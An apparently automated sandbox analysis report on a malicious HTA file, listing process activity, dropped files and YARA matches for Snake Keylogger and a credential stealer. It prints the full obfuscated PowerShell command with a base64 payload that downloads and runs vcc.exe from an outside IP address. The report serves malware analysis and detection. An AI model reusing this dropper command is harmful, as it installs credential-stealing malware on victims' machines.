                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: This is a third-party compiled AutoIt script.11_2_00033B3A
                    Source: vcc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: vcc.exe, 0000000B.00000000.1343912812.00000000000E4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7196fabc-1
                    Source: vcc.exe, 0000000B.00000000.1343912812.00000000000E4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e4aadf17-0
                    Source: vcc.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a9ab38e0-4
                    Source: vcc.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cef896fb-3
                    Source: vcc[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b04a2cf3-9
                    Source: vcc[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3b5eb9b6-6
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\vcc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,11_2_0009A1EF
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00088310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00088310
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_000951BD
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0003E6A011_2_0003E6A0
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005D97511_2_0005D975
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0003FCE011_2_0003FCE0
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000521C511_2_000521C5
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000662D211_2_000662D2
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000B03DA11_2_000B03DA
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0006242E11_2_0006242E
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000525FA11_2_000525FA
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0008E61611_2_0008E616
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000466E111_2_000466E1
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0006878F11_2_0006878F
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0004880811_2_00048808
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0006684411_2_00066844
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000B085711_2_000B0857
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009888911_2_00098889
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005CB2111_2_0005CB21
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00066DB611_2_00066DB6
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00046F9E11_2_00046F9E
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0004303011_2_00043030
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005318711_2_00053187
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005F1D911_2_0005F1D9
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0003128711_2_00031287
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005148411_2_00051484
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0004552011_2_00045520
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005769611_2_00057696
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0004576011_2_00045760
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005197811_2_00051978
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00069AB511_2_00069AB5
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00051D9011_2_00051D90
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005BDA611_2_0005BDA6
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000B7DDB11_2_000B7DDB
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0003DF0011_2_0003DF00
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00043FE011_2_00043FE0
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0090226011_2_00902260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025EC16812_2_025EC168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025EA7F212_2_025EA7F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025ECA5812_2_025ECA58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E19B812_2_025E19B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E7E6812_2_025E7E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E4F0812_2_025E4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E2DD112_2_025E2DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025EB9D012_2_025EB9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025EB9E012_2_025EB9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E7E6612_2_025E7E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025E4EF812_2_025E4EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514049812_2_05140498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514048A12_2_0514048A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514269812_2_05142698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514268712_2_05142687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514000612_2_05140006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514400012_2_05144000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514004012_2_05140040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05142CD012_2_05142CD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05142CE012_2_05142CE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05140B2012_2_05140B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05144AE012_2_05144AE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514161012_2_05141610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514162012_2_05141620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514333012_2_05143330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514332012_2_05143320
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_05143FEF12_2_05143FEF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514397412_2_05143974
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0514398012_2_05143980
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 00058900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 00037DE1 appears 35 times
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 00050AE3 appears 70 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009A06A GetLastError,FormatMessageW,11_2_0009A06A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000881CB AdjustTokenPrivileges,CloseHandle,11_2_000881CB
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_000887E1
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_0009B333
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_000AEE0D
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009C397 CoInitialize,CoCreateInstance,CoUninitialize,11_2_0009C397
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00034E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00034E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3256:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axhiry3e.oct.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 0000000C.00000002.2497932312.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2500051768.000000000380D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000028D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: kissingwithbestexperiencedgirlfriendonhereformenice.htaVirustotal: Detection: 30%
                    Source: kissingwithbestexperiencedgirlfriendonhereformenice.htaReversingLabs: Detection: 21%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\kissingwithbestexperiencedgirlfriendonhereformenice.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc